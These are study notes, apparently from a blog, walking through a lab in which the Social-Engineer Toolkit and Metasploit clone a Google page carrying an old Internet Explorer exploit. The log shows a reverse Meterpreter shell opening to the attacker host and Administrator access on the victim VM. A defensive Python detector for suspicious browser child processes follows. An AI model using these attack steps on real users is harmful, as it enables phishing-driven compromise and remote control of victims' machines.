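!!!These notes are for study and exchange only; do not use them for any other purpose!!!
setoolkit is a very useful social-engineering toolkit that bundles many tools; here the author only notes down its simplest usage.
Workflow for generating an exploit web page with setoolkit and Metasploit working together: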
    Welcome to the Social-Engineer Toolkit (SET).
    The one stop shop for all of your SE needs.

    Join us on irc.freenode.net in channel #setoolkit

    The Social-Engineer Toolkit is a product of TrustedSec.

    Visit: https://www.trustedsec.com

    Select from the menu:

       1) Social-Engineering Attacks
    .......
    set> 1    # option 1

       1) Spear-Phishing Attack Vectors
       2) Website Attack Vectors
    .......
    set> 2    # option 2

       1) Java Applet Attack Method
       2) Metasploit Browser Exploit Method
    ......
    set:webattack>2    # option 2: directly generate an exploit web page that attacks the browser

       1) Web Templates
    .......
    set:webattack>1    # for simplicity, use an existing template

      1. Java Required
      2. Google
      3. Facebook
      4. Twitter
      5. Yahoo

    set:webattack> Select a template:2    # clone Google

    Enter the browser exploit you would like to use [8]:
    .......
      33) Microsoft Internet Explorer iepeers.dll Use After Free (2010-03-09)
      34) Microsoft Internet Explorer "Aurora" Memory Corruption (2010-01-14)
      35) Microsoft Internet Explorer Tabular Data Control Exploit (2010-03-0)
    .......
    set:payloads>34    # use exploit no. 34

       1) Windows Shell Reverse_TCP               Spawn a command shell on victim and send back to attacker
       2) Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker
    .......
    set:payloads>2    # Meterpreter
    set:payloads> Port to use for the reverse [443]:
    .......
    [-] This may take a few to load MSF...
    .......
    .......
    resource (/root/.set/meta_config)> exploit -j    # as you can see, setoolkit starts Metasploit automatically and then creates a background job
    [*] Exploit running as background job.
    msf exploit(ms09_002_memory_corruption) >
    [*] Started reverse handler on 192.168.19.128:443
    [*] Using URL: http://0.0.0.0:8080/
    [*]  Local IP: http://192.168.19.128:8080/
    [*] Server started.

    msf exploit(ms09_002_memory_corruption) >    # when an IE browser visits this exploit page, the vulnerability is triggered
    [-] 192.168.19.129   ms09_002_memory_corruption - Exception handling request: Connection reset by peer
    [*] 192.168.19.129   ms09_002_memory_corruption - Sending Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption
    [*] 192.168.19.129   ms09_002_memory_corruption - Sending Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption
    [*] Sending stage (769024 bytes) to 192.168.19.129
    [*] Meterpreter session 1 opened (192.168.19.128:443 -> 192.168.19.129:1226) at 2014-06-01 23:26:09 +0800    # the session has been opened
    [*] Session ID 1 (192.168.19.128:443 -> 192.168.19.129:1226) processing InitialAutoRunScript 'migrate -f'
    [*] Current server process: IEXPLORE.EXE (1364)
    [*] Spawning notepad.exe process to migrate to
    [+] Migrating to 572    # meterpreter was automatically migrated to another process
    [+] Successfully migrated to process

    msf exploit(ms09_002_memory_corruption) > sessions    # list sessions

    Active sessions
    ===============

      Id  Type                   Information                                Connection
      --  ----                   -----------                                ----------
      1   meterpreter x86/win32  WINXP-PRO-VM\Administrator @ WINXP-PRO-VM  192.168.19.128:443 -> 192.168.19.129:1226 (192.168.19.129)

    msf exploit(ms09_002_memory_corruption) > sessions -i 1    # interact
    [*] Starting interaction with 1...

    meterpreter > getuid
    Server username: WINXP-PRO-VM\Administrator
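On the defending side, the transcript shows a clear host artifact: the browser process IEXPLORE.EXE (1364) spawns notepad.exe (572) right after loading the page. The following is an added example, not part of the original notes or of SET/Metasploit: it flags a browser starting an unexpected child process and lists the destinations the browser contacted just before. The event records, field names, allow-list and 60-second window are assumptions constructed for illustration.

```python
from datetime import datetime, timedelta

BROWSERS = {"iexplore.exe"}           # parent images treated as browsers
EXPECTED_CHILDREN = {"iexplore.exe"}  # assumed allow-list; tune per environment
LOOKBACK = timedelta(seconds=60)      # assumed enrichment window before the spawn

# Constructed telemetry modelled on the transcript; field names are hypothetical.
PROC_EVENTS = [
    {"ts": "2014-06-01 23:20:00", "host": "WINXP-PRO-VM", "pid": 1364,
     "image": "IEXPLORE.EXE", "ppid": 1200, "parent": "explorer.exe"},
    {"ts": "2014-06-01 23:26:09", "host": "WINXP-PRO-VM", "pid": 572,
     "image": "notepad.exe", "ppid": 1364, "parent": "IEXPLORE.EXE"},
    {"ts": "2014-06-01 23:40:00", "host": "WINXP-PRO-VM", "pid": 900,
     "image": "notepad.exe", "ppid": 1200, "parent": "explorer.exe"},
]
NET_EVENTS = [
    {"ts": "2014-06-01 23:10:00", "host": "WINXP-PRO-VM", "pid": 1364,
     "dst": "192.168.19.1", "dport": 80},
    {"ts": "2014-06-01 23:26:05", "host": "WINXP-PRO-VM", "pid": 1364,
     "dst": "192.168.19.128", "dport": 8080},
    {"ts": "2014-06-01 23:26:08", "host": "WINXP-PRO-VM", "pid": 1364,
     "dst": "192.168.19.128", "dport": 443},
]

def _ts(text):
    return datetime.strptime(text, "%Y-%m-%d %H:%M:%S")

def suspicious_spawns(proc_events):
    """Process-creation events where a browser started an unexpected child."""
    return [e for e in proc_events
            if e["parent"].lower() in BROWSERS
            and e["image"].lower() not in EXPECTED_CHILDREN]

def triage(proc_events, net_events, lookback=LOOKBACK):
    """Alert on each suspicious spawn, enriched with the parent browser's
    destinations in the lookback window before the spawn."""
    alerts = []
    for p in suspicious_spawns(proc_events):
        dsts = {(n["dst"], n["dport"]) for n in net_events
                if n["host"] == p["host"] and n["pid"] == p["ppid"]
                and timedelta(0) <= _ts(p["ts"]) - _ts(n["ts"]) <= lookback}
        alerts.append({"host": p["host"], "parent_pid": p["ppid"],
                       "child": p["image"], "child_pid": p["pid"],
                       "recent_parent_dsts": sorted(dsts)})
    return alerts

if __name__ == "__main__":
    for alert in triage(PROC_EVENTS, NET_EVENTS):
        print(alert)
```

The notepad.exe started by explorer.exe is not flagged; only the child of the browser is, and the alert carries the 8080 and 443 destinations seen in the transcript as triage context.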